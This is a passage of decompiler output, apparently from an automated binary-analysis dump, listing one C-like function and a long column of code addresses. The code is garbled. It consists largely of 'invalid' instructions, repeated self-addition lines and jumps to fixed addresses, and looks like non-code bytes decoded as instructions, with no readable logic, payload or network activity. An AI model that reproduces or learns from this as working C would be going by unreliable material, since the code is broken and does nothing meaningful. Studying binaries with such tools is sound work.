                    									 *((intOrPtr*)(_t274 + _t372)) =  *((intOrPtr*)(_t274 + _t372)) + _t274;
                    									_pop(ss);
                    									_t357 = _t357 + _t357;
                    									 *((intOrPtr*)(_t274 + 0x12)) =  *((intOrPtr*)(_t274 + 0x12)) + _t274 + 0x12;
                    									 *_t372 =  *_t372 + _t357;
                    									_t277 =  *[fs:eax] * 0x80106;
                    									_t394 = _t394 + 1;
                    									_t408 = _t407 + 1;
                    									_t380 = _t380 - 1;
                    									_t422 = _t420 +  *_t385 - 1;
                    									_push(_t277);
                    									_push(_t380);
                    									_t385 = _t385 - 1;
                    									_push(_t422);
                    									 *0x4c90290 =  *0x4c90290 + _t277;
                    									_t372 = _t372 +  *_t277;
                    									asm("adc eax, 0x181202");
                    									 *_t357 =  *_t357 + 1;
                    									_t278 = _t277 & 0x00000000;
                    									 *_t278 =  *_t278 + _t278;
                    									asm("sbb al, [eax+eax]");
                    								}
                    							}
                    						}
                    					}
                    				}
                    				_t279 = _t278;
                    				_t423 = _t422 + 1;
                    				asm("arpl [gs:ecx], bp");
                    				_push(es);
                    				 *_t394 =  *_t394 + _t279;
                    				 *((intOrPtr*)(_t279 + 0x52)) =  *((intOrPtr*)(_t279 + 0x52)) + _t380;
                    				_t387 = _t385 - 1 + 1;
                    				_push(_t380);
                    				_t373 = _t372 + 1;
                    				 *0x35001d5 =  *0x35001d5 + _t279;
                    				 *_t380 = _t279;
                    				asm("adc bl, [ecx]");
                    				_t358 = _t357 + _t357;
                    				_t409 = _t408 +  *_t394;
                    				 *_t279 =  *_t279 + _t279;
                    				 *_t358 =  *_t358 + _t358;
                    				_t280 = _t279 |  *_t279;
                    				_t489 = _t280;
                    				if(_t489 < 0) {
                    					L98:
                    					_push(_t380);
                    					_push(_t423);
                    					_t373 = _t373 + 1 - 1;
                    					_t387 = _t387 - 1;
                    					_t394 = _t394 - 1;
                    					goto L99;
                    				} else {
                    					if(_t489 <= 0) {
                    						L99:
                    						_push(_t358);
                    						_push(_t423);
                    						 *_t394 =  *_t394 + _t280;
                    						 *((intOrPtr*)(_t280 + _t280)) =  *((intOrPtr*)(_t280 + _t280)) + _t373;
                    						_push(_t409);
                    						asm("outsb");
                    						_t423 =  *(_t387 + 0x6c) * 0x75646e61;
                    						asm("insb");
                    						asm("popad");
                    						_t282 = (_t280 ^  *_t280) + 0x5ec062c;
                    						asm("lodsb");
                    						_push(es);
                    						_push(ss);
                    						_push(es);
                    						asm("adc bl, [eax+eax]");
                    						 *_t358 =  *_t358 + 1;
                    						 *_t282 =  *_t282 - _t282;
                    						 *_t282 =  *_t282 + _t282;
                    						_push(ds);
                    						_t280 = _t282 |  *_t282;
                    						_t493 = _t280;
                    						asm("insb");
                    						asm("a16 gs insd");
                    						if(_t493 <= 0) {
                    							asm("popad");
                    							if (_t493 == 0) goto L101;
                    							_push(es);
                    							goto L102;
                    						}
                    					} else {
                    						if(_t489 <= 0) {
                    							goto L98;
                    						} else {
                    							asm("bound ebp, [ecx+edi*2+0x74]");
                    							 *_t394 =  *_t394 + _t280;
                    							 *_t380 =  *_t380 + _t373;
                    							 *((intOrPtr*)(_t380 + 0x65 + _t394 * 2)) =  *((intOrPtr*)(_t380 + 0x65 + _t394 * 2)) + _t380;
                    							_push(0x65);
                    							asm("insb");
                    							asm("popad");
                    							asm("outsb");
                    							 *[fs:0x451017f] =  *[fs:0x451017f] + _t280;
                    							es = _t387;
                    							asm("hlt");
                    							_push(es);
                    							asm("adc bl, [edx]");
                    							_t358 = _t358 + _t358;
                    							_t394 = _t394 +  *_t373;
                    							 *_t280 =  *_t280 + _t280;
                    							 *((intOrPtr*)(_t358 + _t373)) =  *((intOrPtr*)(_t358 + _t373)) + _t358;
                    							_t123 = _t358 + 0x6c;
                    							 *_t123 =  *((intOrPtr*)(_t358 + 0x6c)) + _t373;
                    							_t490 =  *_t123;
                    							asm("popad");
                    							if(_t490 < 0) {
                    								L103:
                    								asm("insd");
                    								_pop(_t409);
                    								_t394 = _t394 +  *((intOrPtr*)(_t358 + 4));
                    								_t329 =  *(_t380 + _t380) * 0x1d;
                    								 *_t329 =  *_t329 + _t329;
                    								_pop(ds);
                    								_push(es);
                    								 *((intOrPtr*)(_t394 + 0x72)) =  *((intOrPtr*)(_t394 + 0x72)) + _t329;
                    								asm("popad");
                    								asm("insd");
                    								 *[gs:eax] =  *[gs:eax] ^ _t329;
                    								_t331 = _t329 +  *_t373;
                    								_t373 = _t373 + 1;
                    								_t423 = _t423 +  *((intOrPtr*)(_t329 + _t329)) - 1;
                    								_t367 = _t358 + _t358 - 1;
                    								 *0x3080325 =  *0x3080325 + _t331;
                    								asm("outsd");
                    								 *(_t387 + 0xa) =  *(_t387 + 0xa) | _t367;
                    								asm("adc bl, [esi]");
                    								_t358 = _t367 + _t367;
                    								_t280 = _t331 +  *((intOrPtr*)(_t331 + _t331));
                    								 *_t394 =  *_t394 + _t280;
                    								 *_t280 =  *_t280 + _t280;
                    								 *0x10040 =  *0x10040 + _t380;
                    								es = _t387;
                    								 *((intOrPtr*)(_t394 + _t358 + 0x40)) =  *((intOrPtr*)(_t394 + _t358 + 0x40)) + _t373;
                    								 *_t280 =  *_t280 + _t280;
                    								asm("invalid");
                    								asm("invalid");
                    								asm("invalid");
                    								asm("invalid");
                    								 *_t280 =  *_t280 + _t280;
                    								 *_t280 =  *_t280 + _t280;
                    								 *_t280 =  *_t280 ^ _t280;
                    							} else {
                    								asm("outsb");
                    								if(_t490 <= 0) {
                    									L102:
                    									 *0x6f6c6200 =  *0x6f6c6200 + _t280;
                    									goto L103;
                    								} else {
                    									asm("outsb");
                    									_t409 =  *_t394 * 0xc0106;
                    									_push(_t358);
                    									_push(_t423);
                    									_t380 = _t380 + 1;
                    									_t423 = _t423 - 1;
                    									_push(_t358);
                    									_push(_t423);
                    									_push(_t380);
                    									 *0x7ca0190 =  *0x7ca0190 + _t280;
                    									_t358 = 0x12026a04;
                    									asm("sbb eax, [eax]");
                    									 *0x12026a04 =  *0x12026a04 + 1;
                    									_t280 = _t280 ^ 0x00000000;
                    									 *_t280 =  *_t280 + _t280;
                    									asm("sbb eax, 0x5845000e");
                    									_t373 = _t373 + 1 + 2;
                    									_push(_t409);
                    									_t387 = _t387 - 1 + 1;
                    									_push(_t409);
                    									goto L98;
                    								}
                    							}
                    						}
                    					}
                    				}
                    				_t283 = _t280 + 1;
                    				 *((intOrPtr*)(_t283 + 0x40d0)) =  *((intOrPtr*)(_t283 + 0x40d0)) + _t283;
                    				 *_t283 =  *_t283 + _t283;
                    				_t284 = _t283 + _t380;
                    				asm("sbb esi, [esi]");
                    				 *_t284 =  *_t284 + _t284;
                    				 *_t284 =  *_t284 + _t284;
                    				 *_t284 =  *_t284 + _t284;
                    				 *_t284 =  *_t284 + _t284;
                    				 *_t284 =  *_t284 + _t284;
                    				 *_t284 =  *_t284 + _t284;
                    				asm("les ebx, [eax]");
                    				_t285 = _t284 + 1;
                    				 *_t373 =  *_t373 + _t285;
                    				 *_t380 =  *_t380 + _t285;
                    				 *((intOrPtr*)(_t394 + _t358 + 0x40)) =  *((intOrPtr*)(_t394 + _t358 + 0x40)) + _t373;
                    				 *_t285 =  *_t285 + _t285;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t285 =  *_t285 + _t285;
                    				 *_t285 =  *_t285 + _t285;
                    				_pop(ds);
                    				_t287 = _t285 + 2;
                    				 *_t287 =  *_t287 + _t380;
                    				asm("rol byte [eax], 1");
                    				 *_t287 =  *_t287 + _t287;
                    				 *_t287 =  *_t287 + _t287;
                    				asm("pushad");
                    				asm("sbb eax, 0x76");
                    				 *_t287 =  *_t287 + _t287;
                    				 *_t287 =  *_t287 + _t287;
                    				 *_t287 =  *_t287 + _t287;
                    				 *_t287 =  *_t287 + _t287;
                    				 *_t287 =  *_t287 + _t287;
                    				asm("cld");
                    				asm("sbb [eax], al");
                    				 *_t287 =  *_t287 + _t287;
                    				 *_t394 = ds;
                    				_t289 = _t287 +  *_t287 + 1;
                    				 *_t289 =  *_t289 + _t289;
                    				 *_t289 =  *_t289 + _t289;
                    				_t359 = _t358 + _t358;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t289 =  *_t289 + 1;
                    				 *_t289 =  *_t289 + _t289;
                    				 *((intOrPtr*)(_t289 + 0x1f)) =  *((intOrPtr*)(_t289 + 0x1f)) + _t380;
                    				_t290 = _t289 + 1;
                    				 *((intOrPtr*)(_t290 - 0x30)) =  *((intOrPtr*)(_t290 - 0x30)) + _t290;
                    				_t291 = _t290 + 1;
                    				 *_t291 =  *_t291 + _t291;
                    				 *_t291 =  *_t291 + _t291;
                    				 *((intOrPtr*)(_t291 + 0x761c)) =  *((intOrPtr*)(_t291 + 0x761c)) + _t291;
                    				 *_t291 =  *_t291 + _t291;
                    				 *_t291 =  *_t291 + _t291;
                    				 *_t291 =  *_t291 + _t291;
                    				 *_t291 =  *_t291 + _t291;
                    				 *_t291 =  *_t291 + _t291;
                    				 *((intOrPtr*)(_t373 + _t359)) =  *((intOrPtr*)(_t373 + _t359)) + _t380;
                    				_t292 = _t291 + 1;
                    				 *_t373 =  *_t373 + _t292;
                    				 *((intOrPtr*)(_t292 + _t292)) =  *((intOrPtr*)(_t292 + _t292)) + _t292;
                    				 *_t394 = ds;
                    				_t293 = _t292 + 1;
                    				 *_t293 =  *_t293 + _t293;
                    				 *_t293 =  *_t293 + _t293;
                    				_t360 = _t359 + _t359;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t293 =  *_t293 + 1;
                    				 *_t293 =  *_t293 + _t293;
                    				 *((intOrPtr*)(_t293 + 0x5000401f)) =  *((intOrPtr*)(_t293 + 0x5000401f)) + _t293;
                    				asm("rol byte [eax], 1");
                    				 *_t293 =  *_t293 + _t293;
                    				 *_t293 =  *_t293 + _t293;
                    				asm("sbb byte [0x76], 0x0");
                    				 *_t293 =  *_t293 + _t293;
                    				 *_t293 =  *_t293 + _t293;
                    				 *_t293 =  *_t293 + _t293;
                    				 *_t293 =  *_t293 + _t293;
                    				 *((intOrPtr*)(_t373 + _t360 + 0x40)) =  *((intOrPtr*)(_t373 + _t360 + 0x40)) + _t373;
                    				 *_t373 =  *_t373 + _t293;
                    				 *0x401e8c00 =  *0x401e8c00 + _t293;
                    				 *_t293 =  *_t293 + _t293;
                    				 *_t293 =  *_t293 + _t293;
                    				_t361 = _t360 + _t360;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t293 =  *_t293 + 1;
                    				 *_t293 =  *_t293 + _t293;
                    				_pop(ds);
                    				_t295 = _t293 + _t380 + 1;
                    				 *((intOrPtr*)(_t295 - 0x30)) =  *((intOrPtr*)(_t295 - 0x30)) + _t295;
                    				_t296 = _t295 + 1;
                    				 *_t296 =  *_t296 + _t296;
                    				 *_t296 =  *_t296 + _t296;
                    				 *((intOrPtr*)(_t296 + 0x761d)) =  *((intOrPtr*)(_t296 + 0x761d)) + _t296;
                    				 *_t296 =  *_t296 + _t296;
                    				 *_t296 =  *_t296 + _t296;
                    				 *_t296 =  *_t296 + _t296;
                    				 *_t296 =  *_t296 + _t296;
                    				 *_t296 =  *_t296 + _t296;
                    				 *((intOrPtr*)(_t373 + _t361 + 0x10040)) =  *((intOrPtr*)(_t373 + _t361 + 0x10040)) + _t296;
                    				_push(es);
                    				 *((intOrPtr*)(_t394 + _t361 + 0x40)) =  *((intOrPtr*)(_t394 + _t361 + 0x40)) + _t373;
                    				 *_t296 =  *_t296 + _t296;
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				asm("invalid");
                    				 *_t296 =  *_t296 + _t296;
                    				 *_t296 =  *_t296 + _t296;
                    				 *_t296 =  *_t296 + _t296;
                    				_t297 = _t296 + 1;
                    				 *((intOrPtr*)(_t297 - 0x30)) =  *((intOrPtr*)(_t297 - 0x30)) + _t380;
                    				_t298 = _t297 + 1;
                    				 *_t298 =  *_t298 + _t298;
                    				 *_t298 =  *_t298 + _t298;
                    				 *_t298 =  *_t298 + _t298;
                    				asm("sbb eax, 0x76");
                    				 *_t298 =  *_t298 + _t298;
                    				 *_t298 =  *_t298 + _t298;
                    				 *_t298 =  *_t298 + _t298;
                    				 *_t298 =  *_t298 + _t298;
                    				 *_t298 =  *_t298 + _t298;
                    				asm("fcomp qword [ecx]");
                    				 *((intOrPtr*)(_t394 + 0x42)) =  *((intOrPtr*)(_t394 + 0x42)) + _t380;
                    				_t300 = _t298 + 0x00000001 ^ 0x2a263621;
                    				 *_t300 =  *_t300 + _t300;
                    				 *_t300 =  *_t300 + _t300;
                    				 *_t300 =  *_t300 + _t300;
                    				 *_t300 =  *_t300 + _t300;
                    				 *_t300 =  *_t300 + _t300;
                    				 *_t300 =  *_t300 + _t300;
                    				 *_t394 =  *_t394 + _t361;
                    				 *_t300 =  *_t300 + _t300;
                    				 *_t300 =  *_t300 + _t300;
                    				 *_t300 =  *_t300 + _t300;
                    				 *_t300 =  *_t300 + _t300;
                    				 *_t300 =  *_t300 + _t300;
                    				 *_t300 =  *_t300 + _t300;
                    				_t301 = _t300 |  *_t300;
                    				 *(_t301 + _t301) =  *(_t301 + _t301) | _t301;
                    				 *_t301 =  *_t301 + _t301;
                    				 *_t301 =  *_t301 + _t301;
                    				 *_t301 =  *_t301 + _t301;
                    				 *_t301 =  *_t301 + _t301;
                    				 *((intOrPtr*)(_t301 + 0x1c)) =  *((intOrPtr*)(_t301 + 0x1c)) + _t380;
                    				_t302 = _t301 + 1;
                    				 *((intOrPtr*)(_t302 - 0x10)) =  *((intOrPtr*)(_t302 - 0x10)) + _t373;
                    				 *_t302 =  *_t302 ^ _t302;
                    				_t362 = _t361 + _t361;
                    				asm("invalid");
                    				 *_t302 =  *_t302 | _t302;
                    				 *_t302 =  *_t302 + _t302;
                    				 *_t302 =  *_t302 + _t302;
                    				 *_t302 =  *_t302 + _t302;
                    				_t303 = _t302 +  *_t302;
                    				 *_t303 =  *_t303 + _t303;
                    				goto 0x74401a29;
                    				asm("sbb al, [eax]");
                    				_t304 = _t303 + 1;
                    				 *(_t380 + _t380) =  *(_t380 + _t380) + _t304;
                    				_t305 = _t304 + 1;
                    				 *_t305 =  *_t305 + _t362;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305;
                    				 *((intOrPtr*)(_t362 - 0x74000000)) =  *((intOrPtr*)(_t362 - 0x74000000)) + _t373;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *((intOrPtr*)(_t409 + 0x4b + _t380 * 2)) =  *((intOrPtr*)(_t409 + 0x4b + _t380 * 2)) + _t373;
                    				_t395 = _t394 - 1;
                    				_t411 = _t409 + 2;
                    				_push(_t362);
                    				_t196 = _t373 + 0x66;
                    				 *_t196 =  *((intOrPtr*)(_t373 + 0x66)) + _t305;
                    				_t498 =  *_t196;
                    				if(_t498 == 0) {
                    					L110:
                    					_t411 = _t305;
                    					_t305 = _t387;
                    					asm("lodsb");
                    					 *_t305 =  *_t305 + _t305;
                    				} else {
                    					if(_t498 >= 0) {
                    						L109:
                    						 *(_t305 - 0x6a2845bf) =  *(_t305 - 0x6a2845bf) ^ _t373;
                    						goto L110;
                    					} else {
                    						_t423 =  *(_t411 + 0x74) * 0x73;
                    						 *_t305 =  *_t305 + _t305;
                    						asm("popad");
                    						asm("o16 jz 0x75");
                    						if( *_t305 < 0) {
                    							_t423 =  *(_t411 + 0x74) * 0x73;
                    							 *_t305 =  *_t305 + _t305;
                    							_push(_t305);
                    							 *_t305 =  *_t305 + _t305;
                    							 *((intOrPtr*)(_t411 - 0x50520f0c)) =  *((intOrPtr*)(_t411 - 0x50520f0c)) + _t362;
                    							_t325 = _t362;
                    							_t362 = _t305;
                    							 *(_t411 - 0x54) =  *(_t411 - 0x54) | 0x000000ed;
                    							_t305 = _t325 - 0xb9;
                    							 *((intOrPtr*)(_t380 + 0x12d4)) = cs;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							asm("sldt word [eax]");
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							asm("sbb al, [esi]");
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t305;
                    							_push(0x4c004012);
                    							 *_t305 =  *_t305 + _t305;
                    							 *_t305 =  *_t305 + _t380;
                    							 *_t305 =  *_t305 + _t305;
                    							 *(_t373 + 0x319e6237) =  *(_t373 + 0x319e6237) & _t362;
                    							goto L109;
                    						}
                    					}
                    				}
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t373 =  *_t373 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *((intOrPtr*)(_t362 + _t305 * 4)) =  *((intOrPtr*)(_t362 + _t305 * 4)) + _t373;
                    				 *_t305 =  *_t305 + _t305;
                    				 *_t305 =  *_t305 + _t305;
                    				 *((intOrPtr*)(_t305 + 0x38)) =  *((intOrPtr*)(_t305 + 0x38)) + _t362;
                    				_t307 = _t305 + 1;
                    				 *((intOrPtr*)(_t307 + _t307 + 0x10000)) =  *((intOrPtr*)(_t307 + _t307 + 0x10000)) + _t362;
                    				 *_t307 =  *_t307 + _t307;
                    				 *_t395 = ds;
                    				_t308 = _t307 + 1;
                    				 *_t308 =  *_t308 + _t308;
                    				 *_t308 =  *_t308 + _t308;
                    				 *((intOrPtr*)(_t308 - 0xffbf44)) =  *((intOrPtr*)(_t308 - 0xffbf44)) + _t380;
                    				asm("invalid");
                    				 *_t308 =  *_t308 + 1;
                    				 *_t308 =  *_t308 + _t308;
                    				 *_t308 =  *_t308 + _t380;
                    				_pop(ds);
                    				_t309 = _t308 + 1;
                    				 *((intOrPtr*)(_t309 + _t380 * 8)) =  *((intOrPtr*)(_t309 + _t380 * 8)) + _t362;
                    				_t310 = _t309 + 1;
                    				 *_t310 =  *_t310 + _t310;
                    				 *_t310 =  *_t310 + _t310;
                    				_t311 = _t310 + _t380;
                    				asm("sbb esi, [esi]");
                    				 *_t311 =  *_t311 + _t311;
                    				 *_t311 =  *_t311 + _t311;
                    				 *_t311 =  *_t311 + _t311;
                    				 *_t311 =  *_t311 + _t311;
                    				 *_t311 =  *_t311 + _t311;
                    				 *_t311 =  *_t311 + _t311;
                    				 *_t362 = ds;
                    				_t312 = _t311 + 1;
                    				 *_t373 =  *_t373 + _t312;
                    				 *_t312 =  *_t312 + _t312;
                    				 *((intOrPtr*)(_t411 + 0x40)) =  *((intOrPtr*)(_t411 + 0x40)) + _t380;
                    				 *_t312 =  *_t312 + _t312;
                    				 *_t362 = ds;
                    				_t313 = _t312 + 1;
                    				 *_t373 =  *_t373 + _t313;
                    				 *_t313 =  *_t313 + _t313;
                    				 *((intOrPtr*)(_t362 + _t362 + 0x40)) =  *((intOrPtr*)(_t362 + _t362 + 0x40)) + _t380;
                    				 *_t313 =  *_t313 + _t313;
                    				asm("sbb eax, [eax]");
                    				 *_t313 =  *_t313 + _t313;
                    				 *_t313 =  *_t313 + _t313;
                    				_t314 = _t423;
                    				asm("sbb eax, [eax]");
                    				 *_t314 =  *_t314 + _t314;
                    				asm("sbb eax, [eax]");
                    				asm("movsb");
                    				asm("aad 0x40");
                    				 *_t314 =  *_t314 + _t314;
                    				 *_t314 =  *_t314 + _t314;
                    				_t315 = _t314 + 1;
                    				_t396 = 0xbc006c00;
                    				if (_t315 != 0) goto L112;
                    				asm("les esp, [0x25d40040]");
                    				_t316 = _t315 + 1;
                    				 *_t316 =  *_t316 + _t316;
                    				_pop(ds);
                    				 *((intOrPtr*)(_t316 + _t316)) =  *((intOrPtr*)(_t316 + _t316)) + _t380;
                    				 *_t316 =  *_t316 + _t316;
                    				asm("adc al, 0x21");
                    				_t317 = _t316 + 1;
                    				asm("invalid");
                    				 *_t317 =  *_t317 + 1;
                    				 *_t317 =  *_t317 + _t317;
                    				 *_t317 =  *_t317 + _t317;
                    				 *_t317 =  *_t317 + _t317;
                    				 *0x64400044 =  *((intOrPtr*)(0x64400044)) + 1;
                    				if ( *((intOrPtr*)(0x64400044)) == 0) goto L113;
                    				_t319 = (_t317 & 0x00000021) + 1;
                    				asm("invalid");
                    				 *_t319 =  *_t319 + 1;
                    				 *_t319 =  *_t319 + _t319;
                    				 *0x1B140048 =  *((intOrPtr*)(0x1b140048)) + _t380;
                    				asm("adc [eax], eax");
                    				_t322 = _t319 + 0x14;
                    				 *((intOrPtr*)(_t380 + 4)) =  *((intOrPtr*)(_t380 + 4)) + _t373;
                    				asm("adc al, [eax]");
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				 *_t322 =  *_t322 + _t322;
                    				asm("hlt");
                    				 *_t322 =  *_t322 + _t322;
                    				 *((intOrPtr*)(_t396 + 0x44)) =  *((intOrPtr*)(_t396 + 0x44)) + _t373;
                    				_push(ds);
                    				_t323 = _t322 + 1;
                    				 *_t323 =  *_t323 + _t323;
                    				 *_t323 =  *_t323 + _t323;
                    				 *((intOrPtr*)(_t323 - 0x43)) =  *((intOrPtr*)(_t323 - 0x43)) + _t323;
                    				_t324 = _t323 + 1;
                    				 *_t324 =  *_t324 + _t324;
                    				return _t324;
                    			}
                    0x0040177b
                    0x0040177b
                    0x0040170f
                    0x004016d0
                    0x004016cb
                    0x004016c7
                    0x0040177c
                    0x0040177e
                    0x0040177f
                    0x00401783
                    0x00401784
                    0x00401786
                    0x0040178a
                    0x0040178b
                    0x0040178c
                    0x0040178d
                    0x00401793
                    0x00401797
                    0x00401799
                    0x0040179b
                    0x0040179d
                    0x0040179f
                    0x004017a1
                    0x004017a1
                    0x004017a3
                    0x0040180a
                    0x0040180a
                    0x0040180c
                    0x0040180d
                    0x0040180e
                    0x0040180f
                    0x00000000
                    0x004017a5
                    0x004017a5
                    0x00401810
                    0x00401810
                    0x00401811
                    0x00401812
                    0x00401814
                    0x00401817
                    0x00401818
                    0x00401819
                    0x00401820
                    0x00401821
                    0x00401824
                    0x00401829
                    0x0040182a
                    0x0040182b
                    0x0040182c
                    0x0040182d
                    0x00401830
                    0x00401832
                    0x00401834
                    0x00401836
                    0x00401837
                    0x00401837
                    0x00401839
                    0x0040183a
                    0x0040183e
                    0x00401841
                    0x00401842
                    0x00401844
                    0x00000000
                    0x00401844
                    0x004017a7
                    0x004017a7
                    0x00000000
                    0x004017a9
                    0x004017a9
                    0x004017ad
                    0x004017af
                    0x004017b1
                    0x004017b5
                    0x004017b8
                    0x004017b9
                    0x004017ba
                    0x004017bb
                    0x004017c3
                    0x004017c4
                    0x004017c5
                    0x004017c6
                    0x004017c8
                    0x004017ca
                    0x004017cc
                    0x004017ce
                    0x004017d1
                    0x004017d1
                    0x004017d1
                    0x004017d4
                    0x004017d5
                    0x00401846
                    0x0040184b
                    0x0040184f
                    0x00401850
                    0x00401855
                    0x0040185e
                    0x00401860
                    0x00401861
                    0x00401862
                    0x00401865
                    0x00401866
                    0x00401867
                    0x0040186c
                    0x0040186f
                    0x00401870
                    0x00401871
                    0x00401872
                    0x00401878
                    0x00401879
                    0x0040187c
                    0x0040187e
                    0x00401880
                    0x00401883
                    0x00401885
                    0x00401887
                    0x0040188e
                    0x0040188f
                    0x00401896
                    0x00401898
                    0x0040189a
                    0x0040189c
                    0x0040189e
                    0x004018a0
                    0x004018a2
                    0x004018a4
                    0x004017d7
                    0x004017d7
                    0x004017d8
                    0x00401845
                    0x00401845
                    0x00000000
                    0x004017da
                    0x004017da
                    0x004017db
                    0x004017e2
                    0x004017e3
                    0x004017e5
                    0x004017e7
                    0x004017e9
                    0x004017eb
                    0x004017ed
                    0x004017ee
                    0x004017f4
                    0x004017f9
                    0x004017fb
                    0x004017fd
                    0x004017ff
                    0x00401801
                    0x00401806
                    0x00401807
                    0x00401808
                    0x00401809
                    0x00000000
                    0x00401809
                    0x004017d8
                    0x004017d5
                    0x004017a7
                    0x004017a5
                    0x004018a6
                    0x004018a7
                    0x004018ad
                    0x004018af
                    0x004018b1
                    0x004018b4
                    0x004018b6
                    0x004018b8
                    0x004018ba
                    0x004018bc
                    0x004018be
                    0x004018c0
                    0x004018c2
                    0x004018c3
                    0x004018c5
                    0x004018c7
                    0x004018ce
                    0x004018d0
                    0x004018d2
                    0x004018d4
                    0x004018d6
                    0x004018d8
                    0x004018da
                    0x004018dd
                    0x004018de
                    0x004018df
                    0x004018e1
                    0x004018e4
                    0x004018e6
                    0x004018e8
                    0x004018e9
                    0x004018ee
                    0x004018f0
                    0x004018f2
                    0x004018f4
                    0x004018f6
                    0x004018f8
                    0x004018f9
                    0x004018fc
                    0x00401900
                    0x00401902
                    0x00401903
                    0x00401905
                    0x00401907
                    0x00401909
                    0x0040190b
                    0x0040190d
                    0x0040190f
                    0x00401911
                    0x00401913
                    0x00401916
                    0x00401917
                    0x0040191a
                    0x0040191b
                    0x0040191d
                    0x0040191f
                    0x00401925
                    0x00401927
                    0x00401929
                    0x0040192b
                    0x0040192d
                    0x0040192f
                    0x00401932
                    0x00401933
                    0x00401935
                    0x00401938
                    0x0040193a
                    0x0040193b
                    0x0040193d
                    0x0040193f
                    0x00401941
                    0x00401943
                    0x00401945
                    0x00401947
                    0x00401949
                    0x0040194b
                    0x00401951
                    0x00401954
                    0x00401956
                    0x00401958
                    0x0040195f
